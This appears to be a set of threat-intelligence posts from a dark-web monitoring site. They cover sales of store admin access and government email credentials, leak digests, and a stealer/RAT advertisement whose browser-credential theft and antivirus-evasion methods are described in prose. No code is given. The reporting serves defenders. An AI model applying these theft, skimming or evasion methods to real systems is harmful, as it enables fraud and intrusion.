panel but not exposed externally. - **Payment System**: REDSYS redirect, meaning the site processes card payments through Spain's national payment infrastructure. This is the key value of the listing for financially motivated buyers. - **Transaction Volume**: January saw approximately 1,200 card orders, February approximately 1,150, and March approximately 1,200, showing consistent monthly payment volume. The primary risk here is payment fraud. A buyer with WordPress admin access to a site processing \~1,200 monthly REDSYS card transactions could inject payment skimmers, redirect payment flows, modify checkout pages, access stored customer and order data, or use the site's legitimate merchant account for fraudulent transactions. REDSYS processes the majority of card payments in Spain, so a compromised REDSYS-integrated store is a high-value target for carders and financial fraud operators. ## Access & Risk Categories WordPress Full Admin REDSYS Payment Gateway Card Transaction Data Customer Order Records Payment Skimmer Injection Risk Site Log Access Checkout Page Modification ## Image Preview [![Forum auction post by bobby_killa selling WordPress admin access to Spanish e-commerce site with REDSYS payment redirect and monthly order volumes](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/298765298376598273568927356872936589723-1.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/298765298376598273568927356872936589723-1.png) ## Claim URL Subscriber Access Required The original listing URL and unredacted claim images are available on the Threat Feed and Ransomware Feed for paid subscribers. [ Subscribe](https://darkwebinformer.com/pricing) Subscriber Access View the original listing URL and unredacted claim images on the feeds below. [ Threat Feed](https://darkwebinformer.com/threat-feed/) [ Ransomware Feed](https://darkwebinformer.com/ransomware-feed) ## MITRE ATT&CK Mapping [ T1078 Valid Accounts Full WordPress administrator credentials providing complete control over the e-commerce site, its content, plugins, themes, and user management. ](https://attack.mitre.org/techniques/T1078/) [ T1659 Content Injection WordPress admin access enables injection of payment skimmers, malicious JavaScript, or modified checkout pages to intercept card data from \~1,200 monthly transactions. ](https://attack.mitre.org/techniques/T1659/) [ T1565.002 Data Manipulation: Transmitted Data REDSYS payment redirect can be modified to intercept or duplicate card transaction data as it flows between the customer, the store, and the payment processor. ](https://attack.mitre.org/techniques/T1565/002/) [ T1657 Financial Theft The primary motivation for this access sale is financial fraud, using the compromised merchant's legitimate REDSYS integration to skim card data or redirect payment flows. ](https://attack.mitre.org/techniques/T1657/) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Threat Actor Selling Email Credentials for Israeli Government Agencies, Organizations, and International Targets Including Israel Police, Ministry of Justice, and Quebec Education Board URL: https://darkwebinformer.com/threat-actor-selling-email-credentials-for-israeli-government-agencies-organizations-and-international-targets-including-israel-police-ministry-of-justice-and-quebec-education-board/ Last updated: 2026-03-31T17:53:02.000Z Dark Web Informer - Cyber Threat Intelligence # Threat Actor Selling Email Credentials for Israeli Government Agencies, Organizations, and International Targets Including Israel Police, Ministry of Justice, and Quebec Education Board March 31, 2026 - 2:36:48 PM UTC Israel Government / Multi-Sector Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-31 14:36:48 UTC Threat Actor swag Victims Multiple (.gov.il / .co.il) Industry Government / Multi-Sector Category Credential Sale Gov Agencies 6 Organizations 2 Israeli + 2 International Data Type Email Credentials Price Contact Seller Network Open Web Country Israel Severity High ## Incident Overview A threat actor going by swag is selling compromised email credentials from multiple Israeli government agencies, Israeli organizations, and international targets. The listing organizes the affected entities into three categories, with the bulk of the targets being Israeli .gov.il government domains. This represents a significant credential exposure across some of Israel's most sensitive public institutions. The affected entities are organized as follows: - **Israeli Government (.gov.il)**: Israel Police (Mishteret Yisrael), Ministry of Labor, Social Affairs and Social Services (MOLSA), Ministry of Justice (Misrad HaMishpat), Survey of Israel (the official mapping and cadastre authority), Israel Land Authority, and Ziv Medical Center (a government hospital located in Safed). - **Israeli Organizations (.co.il)**: Beny Cohen and Co. (a private law firm), and the Ashalim Association (a major organization for planning and developing services for people with disabilities in Israel). - **International / Other Domains**: The Quebec Central Board of Education in Canada (education sector), and Yahoo email accounts (described as a generic email provider, not a government target). The inclusion of Israel Police, Ministry of Justice, and Ministry of Labor credentials is particularly concerning from a national security perspective, as compromised government email accounts can be used for spear phishing against other government employees, accessing internal communications, pivoting deeper into government networks, or conducting social engineering against citizens who trust official government correspondence. The Ziv Medical Center credentials add a healthcare dimension, potentially exposing patient communications or internal hospital systems. ## Affected Entities Israel Police Ministry of Labor & Social Services Ministry of Justice Survey of Israel Israel Land Authority Ziv Medical Center Beny Cohen & Co. (Law Firm) Ashalim Association Quebec Central Board of Education Yahoo Email Accounts ## Image Preview [![Forum post by swag selling email credentials for Israeli government agencies including Israel Police, Ministry of Justice, and Israeli organizations along with international targets](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/12645240112399190725.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/12645240112399190725.png) ## Claim URL Subscriber Access Required The original listing URL and unredacted claim images are available on the Threat Feed and Ransomware Feed for paid subscribers. [ Subscribe](https://darkwebinformer.com/pricing) Subscriber Access View the original listing URL and unredacted claim images on the feeds below. [ Threat Feed](https://darkwebinformer.com/threat-feed/) [ Ransomware Feed](https://darkwebinformer.com/ransomware-feed) ## MITRE ATT&CK Mapping [ T1078 Valid Accounts Compromised email credentials for government agencies and organizations that can be used to authenticate as legitimate users and access internal systems and communications. ](https://attack.mitre.org/techniques/T1078/) [ T1589.001 Gather Victim Identity: Credentials Harvests email credentials from multiple Israeli government agencies and organizations across law enforcement, justice, healthcare, and social services sectors for resale. ](https://attack.mitre.org/techniques/T1589/001/) [ T1566.002 Phishing: Spearphishing Link Compromised government email accounts can be weaponized for highly credible spear phishing campaigns targeting other officials, citizens, or partner organizations who trust official .gov.il correspondence. ](https://attack.mitre.org/techniques/T1566/002/) [ T1114 Email Collection Access to government email accounts enables collection of internal communications, sensitive documents, contact lists, and intelligence across police, justice, healthcare, and land administration systems. ](https://attack.mitre.org/techniques/T1114/) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Daily Dose of Dark Web Informer - March 30th, 2026 URL: https://darkwebinformer.com/daily-dose-of-dark-web-informer-march-30th-2026/ Last updated: 2026-03-30T21:23:56.000Z Dark Web Informer # Daily Threat Intelligence Digest ⚡ Real-Time Monitoring 🔑 API Access Available High-volume threat intelligence, ransomware data, IOC exports, and comprehensive feed access for security teams and researchers. [Explore API →](https://darkwebinformer.com/api-details/) 🔁 Follow across all official platforms — [darkwebinformer.com/socials](https://darkwebinformer.com/socials) 🔥 Advertising Opportunities Reach a highly engaged audience of **75,300+** unique users monthly and growing. [View details](https://darkwebinformer.com/advertising) 75.3k Unique Visitors 154.1k Pageviews Last 30 days as of Mar 30, 2026\. Next update Apr 30th. 🔒 ## Unlock Premium Intelligence Real-time breach tracking, expert analysis, high-resolution evidence, unredacted feeds, and 5,100+ blog posts. View all plans and features on the pricing page. [View Plans & Subscribe →](https://darkwebinformer.com/pricing) 💚 ## Support Dark Web Informer Contributions help continue monitoring threats and keeping the community informed. 🟠 MoneroXMR 89Z68A33B9sNRf941f5GczU4ZzarTQsWn6dyMVUbo6mk2zYEamh9hALH1odMiVZfynKhjKPS58ASAfDyFdTW9o29Mwf4ArZ Copied 🟡 BitcoinBTC bc1qvs4pfwascp2uln90g3e3l4agnhnjrdn2t578we Copied 🔷 EthereumETH / ERC-20 / USDT 0xbA6bCf2BF50F9789504401AFbf19E8c2CCaa773D Copied Click address to copy · ETH address accepts USDT, USDC, and other ERC-20 tokens ## 📌 Legend 📰Law Enforcement — LEA updates, investigations ⚠️Dark Web Notices — forums, markets, announcements ❗️Urgent Threats — breaches, ransomware, vulnerabilities 💡Insights & Tools — guides, OSINT, learning resources 🔒Subscribers Only — [X/Twitter subscribe](https://x.com/DarkWebInformer/creator-subscriptions/subscribe) ## 🧾 Today's Intelligence Threat Intelligence ❗️ [Noobsaibot HVNC Advertised as Next-Generation Stealer and RAT With Zero-Disk Footprint, Chrome V20 Bypass, Monolithic Architecture, and Guaranteed Zero AV Detections](#) FREE 📰 [NZ Police Bust Major Dark Web Drug Ring in Auckland](#) FREE X/Twitter Updates ❗️ [A dataset allegedly containing 30,000 worldwide email records, organized by country, is being auctioned on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2038633489935847807?s=20) ❗️ [A dataset allegedly containing 5,000 profiles from an Australian mortgage company is being sold on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2038636234000544030?s=20) ❗️ [A dataset allegedly from lesburgersdepapa.fr, a French burger restaurant chain, has been leaked on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2038639382580637743?s=20) ❗️ [A dataset allegedly from Regio Ruta, a public transit platform in Monterrey, Nuevo León, Mexico, has been leaked on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2038641277604925518?s=20) 💡 [TLDSweep: A domain intelligence OSINT tool that sweeps 800+ TLDs to find registered variants of a domain, flag newly registered lookalikes, and alert via Telegram and Discord.](https://x.com/DarkWebInformer/status/2038643707470033050?s=20) ❗️ [A dataset allegedly from lakemonster.com, a website focused on lake conditions and fishing insights, has been leaked on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2038650638767362148?s=20) 🔒 [X Subscribers Only](https://x.com/DarkWebInformer/status/2038658061577998661?s=20) 🔒 [X Subscribers Only](https://x.com/DarkWebInformer/status/2038660187435798938?s=20) ❗️ [Telnetd Flaw (CVE-2026-32746) PoC](https://x.com/DarkWebInformer/status/2038671092479394165?s=20) 🔒 [X Subscribers Only](https://x.com/DarkWebInformer/status/2038673159893688468?s=20) ❗️ [A cybercrime tool called "NetScan" is being advertised on a popular cybercrime forum, offering automated site vulnerability scanning and API key harvesting.](https://x.com/DarkWebInformer/status/2038674682283536422?s=20) ❗️ [Conquerors Electronic Army targeted the website of Jerusalem College of Technology](https://x.com/DarkWebInformer/status/2038676040461996186?s=20) ❗️ [LAPSUS$ Group is allegedly selling a massive dataset of Mercor.com, an AI recruiting platform with $500M+ revenue, is being auctioned on a popular cybercrime forum, TG, and their website.](https://x.com/DarkWebInformer/status/2038681484492460231?s=20) 💡 [netscan\[.\]info... Video:](https://x.com/DarkWebInformer/status/2038683431672979797?s=20) ❗️ [ZDI updated their severity score from 9.8 to 7.0](https://x.com/DarkWebInformer/status/2038687190083948961?s=20) ❗️ [ShinyHunters claims 7.9M Salesforce records from Hallmark.](https://x.com/DarkWebInformer/status/2038689196525674947?s=20) 🔒 [X Subscribers Only](https://x.com/DarkWebInformer/status/2038690877917335645?s=20) 💡 [Meme](https://x.com/DarkWebInformer/status/2038693003208835575?s=20) ❗️ [A hacktivist group called "Nasir Resistance" claims to have breached Dubai International Airport's systems, alleging access to classified intelligence information over the past months.](https://x.com/DarkWebInformer/status/2038694384825172352?s=20) ❗️ [BD Anonymous targeted the website of Abu Dhabi Police](https://x.com/DarkWebInformer/status/2038697873571709114?s=20) ❗️ [A dataset allegedly containing 689,891 unique member records from the Fédération Française de Savate, the official governing body for French kickboxing, is being sold on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2038699872564470180?s=20) 🔒 [X Subscribers Only](https://x.com/DarkWebInformer/status/2038701319238697085?s=20) ❗️ [CVE-2026-21643 detection script for FortiClientEMS 7.4.4.](https://x.com/DarkWebInformer/status/2038703063796519173?s=20) ❗️ [The vendor is confirmed to be: "Bestnzgear" via NZ Darknet Market Forums](https://x.com/DarkWebInformer/status/2038712060117221669?s=20) ❗️ [A threat actor is distributing a combolist containing 7 million credential pairs.](https://x.com/DarkWebInformer/status/2038712060117221669?s=20) [darkwebinformer.com](https://darkwebinformer.com/)· [socials](https://darkwebinformer.com/socials)· [subscribe](https://darkwebinformer.com/pricing) © Dark Web Informer. All rights reserved. ### NZ Police Bust Major Dark Web Drug Ring in Auckland URL: https://darkwebinformer.com/nz-police-bust-major-dark-web-drug-ring-in-auckland/ Last updated: 2026-03-30T20:24:46.000Z **UPDATE:** The vendor has been confirmed to be "Bestnzgear" via NZ Darknet Market Forumshttp://sq3jigvdjcl7m5wh7dnkdzlzl2awji5iihkyyfu2iysdei3phc7ssnqd\[.\]onion/viewtopic.php?id=202 --- New Zealand Police have dismantled what they allege was one of the country's largest dark web drug operations, arresting two people following a months-long investigation. The operation, dubbed Operation Laver, was led by the National Organised Crime Group as part of an ongoing crackdown on drug importers and suppliers using the dark web. According to Detective Senior Sergeant Reece Sirl, the investigation zeroed in on an account on New Zealand's biggest dark web marketplace that was allegedly responsible for approximately 2,800 separate drug sales between June 2025 and March 2026, a nine-month period with an estimated transaction value of around $1.2 million. The drugs sold reportedly spanned 13 different substances, including methamphetamine, cocaine, MDMA, GBL, and ketamine. Late last week, police raided a rural property in northern Auckland, where they discovered a range of drugs in varying stages of being packaged for distribution to online buyers. Officers also seized roughly $55,000 in cash. A 35-year-old man and a 32-year-old woman were arrested and subsequently appeared before the North Shore District Court, facing a substantial number of charges related to the sale and supply of class A, B, and C controlled drugs. Police have indicated that additional charges may follow as the investigation continues. Detective Senior Sergeant Sirl issued a pointed warning to other dark web vendors, noting that many believe they are operating beyond the reach of law enforcement. He made clear that anonymity on encrypted platforms does not equate to immunity from prosecution. Police confirmed they are continuing to expand their investigative capabilities across dark net and encrypted platforms in collaboration with law enforcement partners. Source: ### Noobsaibot HVNC Advertised as Next-Generation Stealer and RAT With Zero-Disk Footprint, Chrome V20 Bypass, Monolithic Architecture, and Guaranteed Zero AV Detections URL: https://darkwebinformer.com/noobsaibot-hvnc-advertised-as-next-generation-stealer-and-rat-with-zero-disk-footprint-chrome-v20-bypass-monolithic-architecture-and-guaranteed-zero-av-detections/ Last updated: 2026-03-30T20:00:52.000Z Dark Web Informer - Cyber Threat Intelligence # Noobsaibot HVNC Advertised as Next-Generation Stealer and RAT With Zero-Disk Footprint, Chrome V20 Bypass, Monolithic Architecture, and Guaranteed Zero AV Detections March 30, 2026 - 1:26:49 PM UTC N/A Malware / Cybercrime Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-30 13:26:49 UTC Threat Actor c2flow Malware Name Noobsaibot Language C# Category Stealer / HVNC / RAT Architecture Monolithic (No Server) Detection Status Guaranteed 0 AV (At Sale) Max Deployment 1,000 Machines Price $5,000 Network Open Web ## Incident Overview A threat actor going by c2flow is advertising Noobsaibot, a C# combined stealer, HVNC, and remote access tool that the developer positions as architecturally distinct from existing stealers like Venom, Lumma, and similar tools. The actor claims the tool represents a generational leap in stealer design, with a monolithic architecture that eliminates external server dependencies and allows each deployment to operate independently. The listing is priced at $5,000 with a guarantee of zero antivirus detections at time of sale, transacted through a forum guarantor. The tool's capabilities break down into several categories: - **Communications Security**: ECDH elliptic curve key exchange for per-session unique keys, AES-GCM encryption with data integrity checking to prevent packet spoofing or traffic decryption, and TLS 1.3 support for SSL tunneling that disguises traffic as normal secure web browsing. - **Zero-Disk Footprint Stealer**: Bypasses Chrome and Edge App-Bound Encryption (V20) to extract passwords, logins, cookies, and web data directly from browser databases even while the browser is open. Creates no temporary copies in %TEMP% or other folders, reading bytes directly via nolock=1 to leave no disk traces. - **Evasion**: Random overlay ("pump") that appends random bytes to each build, changing file size and hash every time. Reflective loading where the agent never touches disk in clear text, decrypting in memory only. Dynamic build structure makes each instance unique to EDR and AV systems. - **Remote Access**: HVNC (Hidden Virtual Network Computing) for invisible desktop access, standard remote desktop with chunk-optimized screen sharing and full Raspberry Pi keyboard emulation, file manager for downloading/uploading/launching files, process manager for controlling all processes and services, and a keylogger capturing every keystroke in real time. - **Architecture**: Monolithic design with no external dependencies or server infrastructure. Scales to 1,000 computers or servers operating independently. The operator controls where logs are sent and maintains full ownership of the panel and deployments. The actor is vocal about differentiating Noobsaibot from existing stealers, claiming that competitors built server-based architectures focused on controlling logs and profits rather than operator safety, and that those tools are now outdated. The developer claims to be willing to undergo forum administration audits to verify the tool's capabilities. Custom builds in C++ or Rust are mentioned as available but described as very expensive. ## Capabilities & Targets Chrome / Edge Password Extraction App-Bound Encryption (V20) Bypass Cookie & Web Data Theft HVNC (Hidden Desktop) Remote Desktop Keylogger File Manager Process Manager Zero-Disk Footprint Reflective Loading ECDH + AES-GCM Encryption TLS 1.3 Tunneling Random Build Hashing ## Image Preview [![Forum post by c2flow introducing Noobsaibot HVNC with cryptographic standards, zero-disk footprint stealer capabilities, and Chrome V20 bypass details](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/7289346784876124876512.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/7289346784876124876512.png) [![Noobsaibot remote access capabilities, monolithic architecture details, anti-EDR claims, and $5,000 pricing with zero AV detection guarantee](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/7289346784876124876513.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/7289346784876124876513.png) ## Claim URL Subscriber Access Required The original listing URL and unredacted claim images are available on the Threat Feed and Ransomware Feed for paid subscribers. [ Subscribe](https://darkwebinformer.com/pricing) Subscriber Access View the original listing URL and unredacted claim images on the feeds below. [ Threat Feed](https://darkwebinformer.com/threat-feed/) [ Ransomware Feed](https://darkwebinformer.com/ransomware-feed) ## MITRE ATT&CK Mapping [ T1555.003 Credentials from Web Browsers Bypasses Chrome and Edge App-Bound Encryption (V20) to extract saved passwords, cookies, and web data directly from browser databases, even while the browser is running. ](https://attack.mitre.org/techniques/T1555/003/) [ T1056.001 Keylogging Captures every keystroke in real time, recording passwords, messages, and sensitive information as the victim types. ](https://attack.mitre.org/techniques/T1056/001/) [ T1219 Remote Access Software Provides HVNC hidden desktop, standard remote desktop with chunk-optimized screen sharing, file management, and process control for complete remote access invisible to the victim. ](https://attack.mitre.org/techniques/T1219/) [ T1620 Reflective Code Loading The agent never touches disk in cleartext, decrypting and executing entirely in memory through reflective loading to avoid forensic detection and file-based AV scanning. ](https://attack.mitre.org/techniques/T1620/) [ T1027 Obfuscated Files or Information Each build receives a random byte overlay that changes file size and hash, combined with dynamic build structures that make every instance unique to EDR and AV signature detection. ](https://attack.mitre.org/techniques/T1027/) [ T1573.002 Encrypted Channel: Asymmetric Cryptography Uses ECDH key exchange for per-session unique keys, AES-GCM encryption for data integrity, and TLS 1.3 tunneling to disguise C2 traffic as normal secure web browsing. ](https://attack.mitre.org/techniques/T1573/002/) [ T1539 Steal Web Session Cookie Directly reads browser cookie databases using nolock=1 mode to extract session cookies without creating temporary files, enabling session hijacking with zero disk artifacts. ](https://attack.mitre.org/techniques/T1539/) [ T1106 Native API Reads bytes directly from browser database files via native API calls, bypassing standard file access methods to avoid triggering activity monitoring systems. ](https://attack.mitre.org/techniques/T1106/) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Daily Dose of Dark Web Informer - March 27th, 2026 URL: https://darkwebinformer.com/daily-dose-of-dark-web-informer-march-27th-2026/ Last updated: 2026-03-27T22:44:28.000Z Dark Web Informer # Daily Threat Intelligence Digest ⚡ Real-Time Monitoring 🔑 API Access Available High-volume threat intelligence, ransomware data, IOC exports, and comprehensive feed access for security teams and researchers. [Explore API →](https://darkwebinformer.com/api-details/) 🔁 Follow across all official platforms — [darkwebinformer.com/socials](https://darkwebinformer.com/socials) 🔥 Advertising Opportunities Reach a highly engaged audience of **35,800+** unique users monthly and growing. [View details](https://darkwebinformer.com/advertising) 35.8k Unique Visitors 89.3k Pageviews Last 30 days as of Mar 2, 2026\. Next update Mar 31st. 🔒 ## Unlock Premium Intelligence Real-time breach tracking, expert analysis, high-resolution evidence, unredacted feeds, and 5,100+ blog posts. View all plans and features on the pricing page. [View Plans & Subscribe →](https://darkwebinformer.com/pricing) 💚 ## Support Dark Web Informer Contributions help continue monitoring threats and keeping the community informed. 🟠 MoneroXMR 89Z68A33B9sNRf941f5GczU4ZzarTQsWn6dyMVUbo6mk2zYEamh9hALH1odMiVZfynKhjKPS58ASAfDyFdTW9o29Mwf4ArZ Copied 🟡 BitcoinBTC bc1qvs4pfwascp2uln90g3e3l4agnhnjrdn2t578we Copied 🔷 EthereumETH / ERC-20 / USDT 0xbA6bCf2BF50F9789504401AFbf19E8c2CCaa773D Copied Click address to copy · ETH address accepts USDT, USDC, and other ERC-20 tokens ## 📌 Legend 📰Law Enforcement — LEA updates, investigations ⚠️Dark Web Notices — forums, markets, announcements ❗️Urgent Threats — breaches, ransomware, vulnerabilities 💡Insights & Tools — guides, OSINT, learning resources 🔒Subscribers Only — [X/Twitter subscribe](https://x.com/DarkWebInformer/creator-subscriptions/subscribe) ## 🧾 Today's Intelligence Threat Intelligence ❗️ [SnowTeam Launches Leak Bazaar, a Corporate Data Exchange With ML-Powered Dump Analysis, DBMS Reverse Engineering, and Ransomware Negotiation Support](#) FREE 📰 [CareCloud, Inc. Has Filed Form 8-K Due to a Cybersecurity Incident](#) FREE X/Twitter Updates 💡 [Caine, the current owner of BreachForums, sent the following email out...](https://x.com/DarkWebInformer/status/2037528825383297413?s=20) ❗️ [1/3 Handala Hack, the hacktivist group behind the data leak of senior engineers at Lockheed Martin and the 200,000-user Intune wipe of Stryker, has released personal photos and a document of current FBI Director Kash Patel on their public website and public Telegram channel.](https://x.com/DarkWebInformer/status/2037533650653233249?s=20) ❗️ [BreachForums mod team has retired and Caine claims he was scammed out of $5,000 by Loki.](https://x.com/DarkWebInformer/status/2037537540220088410?s=20) ❗️ [Reuters has confirmed FBI Director Kash Patel's email was indeed hacked.](https://x.com/DarkWebInformer/status/2037541484094771559?s=20) ❗️ [A massive breach of the Superintendencia Nacional de Salud de Colombia (Supersalud), Colombia's national health oversight authority, is being leaked on a popular cybercrime forum. This is labeled as "Package 1" with more threatened to follow.](https://x.com/DarkWebInformer/status/2037548412233502995?s=20) ❗️ [Handala Hack is currently claiming a breach of a widespread disruption in point-of-sale systems across chain stores throughout the United States. No other details were provided by the group.](https://x.com/DarkWebInformer/status/2037550997275398252?s=20) ❗️ [The group ShadowByt3$ claims to have breached the University of Georgia, stealing approximately 3.2 MB of employee data in raw text files. No customer data was reportedly affected.](https://x.com/DarkWebInformer/status/2037556721132974585?s=20) 💡 [BreachForums drama and FBI Director drama all in one day...](https://x.com/DarkWebInformer/status/2037557630017663183?s=20) ❗️ [The Mexico dataset of C&A Modas, the international fashion retailer, has allegedly been leaked and made available for download on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2037561432187805831?s=20) ❗️ [A database allegedly belonging to the Instituto Tecnológico Superior de Irapuato, a Mexican higher education institution, has been leaked on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2037563367817093222?s=20) 🔒 [X Subscribers Only](https://x.com/DarkWebInformer/status/2037564142328975858?s=20) ❗️ [The Dutch National Police have issued a press release stating they were targeted of a successful phishing attack, discovered it quickly, and immediately closed access.](https://x.com/DarkWebInformer/status/2037565231711338819?s=20) 🔒 [X Subscribers Only](https://x.com/DarkWebInformer/status/2037573332975923227?s=20) ❗️ [A database allegedly containing 318,000 user records from Bienestar.org, a healthcare organization serving the Latino Gay Community with HIV/AIDS treatment, sexual health, mental health, substance abuse counseling, and medication-assisted treatment since 1989, is being sold on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2037575085440020591?s=20) ❗️ [Source code from multiple UAE websites has allegedly been leaked on a popular cybercrime forum, including exposed repositories and projects.](https://x.com/DarkWebInformer/status/2037578907977744838?s=20) ❗️ [A threat actor claims to be selling admin access to an unidentified retail company from the UAE.](https://x.com/DarkWebInformer/status/2037580678909317151?s=20) 💡 [A high-ranking forum moderator is publicly seeking to buy any data or access from active or defunct BreachForums clones, claiming the goal is to "put an end to these clones."](https://x.com/DarkWebInformer/status/2037584491741331676?s=20) 💡 [I don't have much more to add to this tool to be honest. I'm just running some tests and need to create a Readme on GitHub. The only addition since this past update is it will provide a HTML file from the rolling updates you've done for that particular keyword.](https://x.com/DarkWebInformer/status/2037587504602198321?s=20) ❗️ [Access to over 30 Claro Cloud user websites is allegedly being offered on a popular cybercrime forum, with claims that the telecom giant's cloud platform has severe security flaws allowing malicious code uploads and website infections.](https://x.com/DarkWebInformer/status/2037593989600116890?s=20) 🔒 [X Subscribers Only](https://x.com/DarkWebInformer/status/2037598427781931067?s=20) 🔒 [X Subscribers Only](https://x.com/DarkWebInformer/status/2037599352357536217?s=20) ❗️ [Handala Hack claims "Tonight, your sons will deliver a surprise in a joint cyber-missile operation. Do not forget the recitation of Surah al-Fath."](https://x.com/DarkWebInformer/status/2037601448175816957?s=20) 💡 [Just a FYI, you may see duplicate posts on the threat feed for the next 48 hours or so. It will be minimal, it's to provide better screenshots on the feed in the coming days/week. Ignore them unless you see them published on different claim sites.](https://x.com/DarkWebInformer/status/2037606130394751030?s=20) 💡 [New infostealer.](https://x.com/DarkWebInformer/status/2037607903926853965?s=20) 🔒 [X Subscribers Only](https://x.com/DarkWebInformer/status/2037610088072962232?s=20) ❗️ [Sheraton Hotels and Resorts, the American international hotel chain owned by Marriott International, has allegedly been listed on a ransomware leak site with its status marked as "Disclosed."](https://x.com/DarkWebInformer/status/2037613463179337965?s=20) ❗️ [Handala Hack's website is currently offline. Their previous website was seized by the FBI last week. It's possible that a new seizure could be taking place, but that is just my opinion for now. Nothing from the feds or Handala at this time. My FBI Watchdog script detected a change.](https://x.com/DarkWebInformer/status/2037614777468334251?s=20) 💡 [A new Android Remote Administration Tool (RAT) called "Darkweb" is being sold on a popular cybercrime forum, marketed as "the most powerful" Android hacking tool available.](https://x.com/DarkWebInformer/status/2037625720562667684?s=20) 🔒 [X Subscribers Only](https://x.com/DarkWebInformer/status/2037633224147407207?s=20) 💡 [You guys had a chance in December. That chance is long gone now.](https://x.com/DarkWebInformer/status/2037635713391276254?s=20) 💡 [Spear, I don't know if this a new forum IP being used or what, it wasn't there yesterday. Regardless, your IP is leaking, again.](https://x.com/DarkWebInformer/status/2037637849709781189?s=20) ❗️ [The new admin of the BreachForums clone, Caine, just had his account hacked by Spear Forum; spear\[.\]cx.](https://x.com/DarkWebInformer/status/2037645723504615665?s=20) [darkwebinformer.com](https://darkwebinformer.com/)· [socials](https://darkwebinformer.com/socials)· [subscribe](https://darkwebinformer.com/pricing) © Dark Web Informer. All rights reserved. ### CareCloud, Inc. Has Filed Form 8-K Due to a Cybersecurity Incident URL: https://darkwebinformer.com/carecloud-inc-has-filed-form-8-k-due-to-a-cybersecurity-incident/ Last updated: 2026-03-27T21:32:25.000Z On March 16, 2026, CareCloud, Inc. (the “Company”) experienced a temporary network disruption in its CareCloud Health division that partially impacted the functionality and data access to 1 of its 6 electronic health record environments for approximately 8 hours until the Company fully restored all functionality and data access during that evening. Upon discovery of this incident, the Company promptly reported the matter to its cybersecurity carrier and engaged a leading cyber response advisory team which is part of a Big Four accounting firm to perform external cybersecurity work and to assist with securing the environment, as well as to conduct a comprehensive IT forensic investigation to determine the nature and scope of this incident. The Company further believes that the incident was contained to the CareCloud Health environment and did not affect the Company’s other platforms, divisions, systems, data or environments. The incident was contained on the day it was discovered. The Company believes that it has sufficient cybersecurity insurance coverage for any potential losses. The Company further believes that the incident was caused by an unauthorized third party who temporarily had access to the system. The Company has reported the matter to the appropriate law enforcement authorities. The Company is continuing to investigate the nature and scope of the incident. The affected environment stores patient information, and the Company continues to assess whether, and the extent to which, patient information or other data was accessed or exfiltrated, and the categories and volume of any such data. All affected systems have been fully restored, and the Company believes that the threat actor no longer has any access to the same. As part of its remediation efforts, the Company is working with its outside cybersecurity experts to further reinforce its information technology systems and to prevent future unauthorized access. As of the date of this Current Report on Form 8-K, the incident has not had a material impact on the Company’s operations. On March 24, 2026, the Company nevertheless determined that the incident is material in light of the sensitivity of the potentially affected information and the potential consequences of the incident, including remediation and response costs, legal, regulatory and notification-related matters, and possible effects on patients, customers, counterparties, reputation and operations. The Company believes that the incident is not reasonably likely to have a material impact on the Company’s financial condition or results of operations but has not yet determined the full impact of the incident. To the extent any information required by Item 1.05(a) of Form 8-K was not determined or was unavailable at the time of this filing, the Company will amend this Current Report on Form 8-K as such information is determined or becomes available. Source: ### SnowTeam Launches Leak Bazaar, a Corporate Data Exchange With ML-Powered Dump Analysis, DBMS Reverse Engineering, and Ransomware Negotiation Support URL: https://darkwebinformer.com/snowteam-launches-leak-bazaar-a-corporate-data-exchange-with-ml-powered-dump-analysis-dbms-reverse-engineering-and-ransomware-negotiation-support/ Last updated: 2026-03-27T21:32:32.000Z Dark Web Informer - Cyber Threat Intelligence # SnowTeam Launches Leak Bazaar, a Corporate Data Exchange With ML-Powered Dump Analysis, DBMS Reverse Engineering, and Ransomware Negotiation Support March 27, 2026 - 11:55:52 AM UTC N/A Cybercrime Infrastructure Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, 